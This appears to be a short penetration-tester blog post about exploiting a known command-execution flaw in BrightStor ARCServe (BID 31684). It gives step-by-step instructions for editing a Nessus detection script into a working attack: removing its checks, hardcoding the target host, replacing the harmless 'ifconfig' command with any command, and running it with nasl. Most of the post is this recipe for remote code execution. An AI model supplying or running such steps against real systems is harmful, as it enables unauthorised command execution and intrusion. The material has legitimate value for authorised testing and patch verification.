Everyone loves to beat up on Microsoft. Hell, I do… sorry Carric. But Microsoft is slowly getting it’s software in order and organizations are learning to patch it very quickly. Personally, love doing exploit development on small custom software. But in a recent case, I saw a larger software package with a known bug but no exploit.
In particular, I’m talking about the command execution vuln released in October for BrightStor ARCServe. BID 31684.
To actually exploit the bug use Nessus/Nasl
Find the file: arcserve_command_exec.nasl
Copy it somewhere and edit. Change the following:
- Ditch the requirements. Comment out
#script_require_keys(“Host/OS/smb”)
#script_require_ports (6504); - Manually set the hostname
host = kb_smb_name(); to host = “hostname”; Note, and IP won’t work - Change the cmd
cmd = “ifconfig”; to whatever you want - Change the output to use the display() function so you can see what happens
- Run the NASL
nasl -t target_ip_or_hostname yournasl.nasl
Yes, this is a bit clunky, but it’s a fairly quick way to execute arbitrary commands on the remote system. RPC (IMO) is difficult and I’d rather not deal with it if some else already has.